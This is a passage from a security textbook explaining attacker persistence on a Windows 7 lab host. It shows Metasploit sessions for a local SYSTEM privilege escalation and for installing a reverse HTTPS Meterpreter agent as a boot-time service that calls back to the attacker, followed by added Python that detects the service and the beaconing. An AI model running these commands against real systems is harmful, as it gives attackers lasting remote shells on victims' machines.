Cyber Operations by Mike O’Leary


Author: Mike O’Leary
Language: eng
Format: epub
Publisher: Apress, Berkeley, CA


Persistence

Another important use of malware by attackers is persistence. A persistence agent lets an attacker return to a compromised system at will, without having to exploit it a second time; it also survives events that would otherwise end the intrusion, such as a reboot of the target or of the attacker's own machine.

Suppose an attacker uses a Veil-Framework payload to gain the initial shell on a Windows 7 system.

msf exploit(handler) >

[*] 10.0.6.132:58502 Request received for /fJYS...

[*] 10.0.6.132:58502 Staging connection for target /fJYS received...

[*] Patched user-agent at offset 663656...

[*] Patched transport at offset 663320...

[*] Patched URL at offset 663384...

[*] Patched Expiration Timeout at offset 664256...

[*] Patched Communication Timeout at offset 664260...

[*] Meterpreter session 1 opened (10.0.4.252:8080 -> 10.0.6.132:58502) at 2014-11-24 16:31:17 -0500

Suppose also that the attacker follows up with the Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) attack to gain a SYSTEM shell.

msf exploit(handler) > use exploit/windows/local/ms13_053_schlamperei

msf exploit(ms13_053_schlamperei) > set session 1

session => 1

msf exploit(ms13_053_schlamperei) > exploit

[*] Started reverse handler on 10.0.4.252:4444

[*] Launching notepad to host the exploit...

[+] Process 4052 launched.

[*] Reflectively injecting the exploit DLL into 4052...

[*] Injecting exploit into 4052...

[*] Found winlogon.exe with PID 420

[*] Sending stage (769536 bytes) to 10.0.6.132

[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell

[*] Meterpreter session 2 opened (10.0.4.252:4444 -> 10.0.6.132:62761) at 2014-11-24 16:32:02 -0500

To create persistence, the attacker runs the persistence script in the privileged Meterpreter session. The script has a number of options, which can be found with the -h switch.

meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent

-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.

-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.

-S Automatically start the agent on boot as a service (with SYSTEM privileges)

-T <opt> Alternate executable template to use

-U Automatically start the agent when the User logs on

-X Automatically start the agent when the system boots

-h This help menu

-i <opt> The interval in seconds between each connection attempt

-p <opt> The port on the remote host where Metasploit is listening

-r <opt> The IP of the system running Metasploit listening for the connect back

An attacker can use this script to instruct the victim to call back to 10.0.4.252 on TCP/443 every five seconds using Meterpreter reverse HTTPS with the command

meterpreter > run persistence -A -P windows/meterpreter/reverse_https -S -i 5 -p 443 -r 10.0.4.252

[*] Running Persistance Script

[*] Resource file for cleanup created at /root/.msf4/logs/persistence/EPIMETHEUS_20141124.3240/EPIMETHEUS_20141124.3240.rc

[*] Creating Payload=windows/meterpreter/reverse_https LHOST=10.0.4.252 LPORT=443

[*] Persistent agent script is 148404 bytes long

[+] Persistent Script written to C:\Windows\TEMP\UzlCwSC.vbs

[*] Starting connection handler at port 443 for windows/meterpreter/reverse_https

[+] Multi/Handler started!

[*] Executing script C:\Windows\TEMP\UzlCwSC.vbs

[+] Agent executed with PID 792

[*] Installing as service..

[*] Creating service HTyzvBnmBPIoB

[*] Meterpreter session 3 opened (10.0.4.252:443 -> 10.0.6.132:62807) at 2014-11-24 16:32:42 -0500

By including the -S switch, the callback agent is installed as a Windows service that starts as SYSTEM each time the computer boots. Even if both the Kali attack system and the target are rebooted, as long as the Kali system restarts the matching handler (exploit/multi/handler with the windows/meterpreter/reverse_https payload, LHOST 10.0.4.252, LPORT 443), the victim will call back after it boots and present the attacker with a new shell. Note that the script writes its VBScript agent to C:\Windows\TEMP and registers a randomly named service to launch it; both are visible to a defender auditing the host, as is the regular five-second callback on the network. The resource file the script reports creating at the start of the run is its cleanup script for removing the agent from the target.
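The two artifacts the persistence script leaves on the target suggest two defensive checks, one on the host and one on the network. The following Python is an added example, not code from the book or from Metasploit. It assumes that the installed service's ImagePath invokes a script host (cscript) on the .vbs file, which is consistent with the output above but not shown on the page, and it uses constructed service entries and a constructed connection log, keeping only the service name, script path and addresses the page reports. The thresholds (five connections, 20 percent jitter) are illustrative.

```python
"""Host- and network-side checks for the persistence agent described above.

Added example with constructed data; not from the book or Metasploit.
"""
import re
import statistics
from collections import defaultdict

# Script hosts that should never be the binary behind a Windows service.
SCRIPT_HOSTS = ("cscript", "wscript")
# Temp directories (lower-cased, backslash form) a service binary should not live in.
TEMP_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\")

# Constructed sample: (service name, ImagePath) as found under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath. The second entry
# uses the service name and script path from the session output above; the
# cscript invocation form is an assumption.
SAMPLE_SERVICES = [
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("HTyzvBnmBPIoB", r'cscript "C:\Windows\TEMP\UzlCwSC.vbs"'),
    ("Backup", r"C:\Program Files\Vendor\backup.exe -svc"),
    ("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs"),
]

# Constructed sample connection log: (seconds since start, src, dst, dst port).
# The agent reconnects to 10.0.4.252:443 roughly every 5 s; other traffic
# from the same host is irregular and sparse.
SAMPLE_CONNS = [
    (0.0, "10.0.6.132", "10.0.4.252", 443),
    (5.1, "10.0.6.132", "10.0.4.252", 443),
    (10.0, "10.0.6.132", "10.0.4.252", 443),
    (14.9, "10.0.6.132", "10.0.4.252", 443),
    (20.1, "10.0.6.132", "10.0.4.252", 443),
    (25.0, "10.0.6.132", "10.0.4.252", 443),
    (1.3, "10.0.6.132", "10.0.6.1", 53),
    (7.8, "10.0.6.132", "10.0.6.1", 53),
    (31.0, "10.0.6.132", "10.0.6.1", 53),
    (2.0, "10.0.6.132", "93.184.216.34", 443),
    (3.0, "10.0.6.132", "93.184.216.34", 443),
    (40.0, "10.0.6.132", "93.184.216.34", 443),
]


def service_findings(entries):
    """Return [(service name, reason)] for services whose ImagePath looks like
    the persistence agent: a script host used as the service binary, or a
    binary/script located under a temp directory."""
    findings = []
    for name, image_path in entries:
        p = image_path.lower()
        reasons = []
        if any(re.search(rf"\b{h}(\.exe)?\b", p) for h in SCRIPT_HOSTS):
            reasons.append("script host as service binary")
        if any(t in p for t in TEMP_DIRS):
            reasons.append("binary under a temp directory")
        if reasons:
            findings.append((name, "; ".join(reasons)))
    return findings


def beacon_findings(conns, min_connections=5, max_jitter=0.2):
    """Group connections by (src, dst, dport) and flag flows whose inter-arrival
    times are nearly constant (relative standard deviation <= max_jitter).
    Returns [((src, dst, dport), mean interval, jitter)]."""
    by_flow = defaultdict(list)
    for ts, src, dst, dport in conns:
        by_flow[(src, dst, dport)].append(ts)
    findings = []
    for flow, times in by_flow.items():
        if len(times) < min_connections:
            continue  # too few connections to call it periodic
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            findings.append((flow, round(mean, 2), round(jitter, 3)))
    return findings


if __name__ == "__main__":
    for name, reason in service_findings(SAMPLE_SERVICES):
        print(f"service {name}: {reason}")
    for flow, mean, jitter in beacon_findings(SAMPLE_CONNS):
        print(f"beacon {flow[0]} -> {flow[1]}:{flow[2]} every {mean}s (jitter {jitter})")
```

On the constructed data only the randomly named service and the 10.0.4.252:443 flow are reported; the DNS and web connections are too few and too irregular. In practice the service check is run against a registry export or `sc qc` output and the beacon check against firewall or NetFlow records, with the interval threshold tuned to whatever the attacker's -i value turns out to be.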





